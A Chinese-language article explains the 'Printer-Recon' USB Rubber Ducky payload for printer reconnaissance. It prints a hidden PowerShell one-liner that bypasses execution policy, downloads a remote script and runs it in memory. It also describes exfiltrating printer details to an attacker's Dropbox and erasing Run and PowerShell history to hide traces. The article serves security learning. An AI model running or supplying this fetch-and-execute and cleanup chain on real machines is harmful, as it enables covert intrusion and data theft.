ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

Printer-Recon:用USB Rubber Ducky枚举打印机的另类侦察技术

Printer-Recon:用USB Rubber Ducky枚举打印机的另类侦察技术 Printer-Recon用USB Rubber Ducky枚举打印机的另类侦察技术【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloadsPrinter-Recon 是一款基于USB Rubber Ducky的打印机信息枚举载荷插入设备后它会自动打开运行框下载并执行一段 PowerShell 脚本把目标机器的打印机名称、类型、驱动名、共享状态和位置信息收集成文件再上传到指定网盘最后清理临时文件与历史记录。这是渗透测试中一种容易被忽视、却很有价值的内网侦察技巧。为什么打印机是侦察盲区大多数人对打印机的认知还停留在打印文件上但在安全视角下打印机是一座信息金矿枚举字段侦察价值Name打印机名可能暴露部门、楼层、设备编号等内部命名规范DriverName驱动名可定位驱动版本为后续打印机驱动漏洞利用提供依据Shared是否共享发现共享打印服务器往往就是域内高价值目标Location位置物理位置信息可用于社工与横向移动规划此外许多网络打印机带有Web 管理界面摸清打印机分布后就能顺藤摸瓜找到这些暴露在局域网里的小设备。正如项目 README 中对该载荷的描述This payload is meant to exfiltrate printer information for further social engineering or driver exploitation.上图展示了典型的 USB Rubber Ducky 载荷工作目录payloads 源码、encoder 编码器与编译产物 inject.bin正是本载荷的部署形态。载荷目录解析3 个文件各司其职Printer-Recon 位于仓库的payloads/library/exfiltration/分类下目录结构非常精简payload.txt —— DuckyScript 键盘注入脚本第 1 阶段PR.ps1 —— 真正的枚举与外传脚本第 2 阶段README.md —— 使用说明与作者信息作者atomiczsec这种注入脚本 外部脚本的组合就是官方文档反复提到的Staged Payloads分阶段载荷模式DuckyScript 只负责点火复杂逻辑全部交给外部脚本完成既省存储空间又便于维护。执行原理运行框 分阶段下载整个攻击链可以拆成 4 步全程无需用户交互等待 2 秒按下Win R呼出运行框输入 PowerShell 一行命令对应 payload.txt 第 16 行powershell -w h -NoP -NonI -ep Bypass $pl iwr TARGET_URL dl1; iex $pl其中-w h隐藏窗口-NoP不加载 Profile-ep Bypass绕过执行策略从TARGET_URL下载脚本到内存并执行——这里用的是内存执行iex磁盘上不留 exe 文件脚本执行完毕目标用户往往毫无察觉。⚙️ 使用前需要做的唯一配置把 payload.txt 第 9 行 的DEFINE TARGET_URL example.com替换为你自己托管 PR.ps1 的共享链接。仓库规范也要求用DEFINE常量 占位域名来管理这类配置方便复用。外传机制Dropbox 上传 自我清理第二阶段脚本 PR.ps1 一共做了三件事① 枚举并落地—— 核心就一行PR.ps1 第 40 行Get-Printer | Select-Object Name, Type, DriverName, Shared, Location结果写入临时目录文件名自动带上当前用户名与时间戳方便攻击者区分多台受害机器。② 上传外传——DropBox-Upload函数通过 REST API 把结果文件推到 Dropbox攻击者在自己的网盘里就能拿到数据。③ 痕迹清理——Clean-Exfil函数PR.ps1 第 22 行会清空临时文件夹、删除运行框历史记录RunMRU 注册表项、删除 PowerShell 历史记录、清空回收站——尽可能不让 defenders 留下线索。类似的外传接收端视图USB Rubber Ducky 载荷将采集到的数据通过 HTTP POST 发到攻击者可控的接收点本例中则是上传到 Dropbox。同类侦察载荷横向参考如果你想继续学习 USB Rubber Ducky 的侦察与外传技巧仓库里还有这些近亲值得一读Dropbox-Bandit —— 同样基于 Dropbox 的浏览器凭证外传Proton-Hog —— 用 Proton 邮件作为外传通道Priv-Paths —— 提权路径信息收集Gather_Network_Info —— 网络配置信息收集recon 分类目录 —— 系统枚举、网络测绘等完整侦察系列DuckyScript 语法示例 —— ATTACKMODE、循环、变量等基础教程想自己编写载荷仓库根目录的 README.md 详细说明了 DuckyScript、PayloadStudio 编译流程与提交规范键盘布局配置在 languages/us.json。使用须知与合规提醒⚠️ 本载荷与仓库中所有内容仅用于安全学习和授权渗透测试只在你拥有书面授权的靶机、实验环境或自有设备上运行替换TARGET_URL前确认外传服务合法可用切勿使用他人账号未经授权在他人设备上运行此类载荷属于违法行为一切后果自负。打印机不会喊救命但它泄露的信息可能比任何一台服务器都更有价值——这正是 Printer-Recon 的魅力所在。【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloads创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表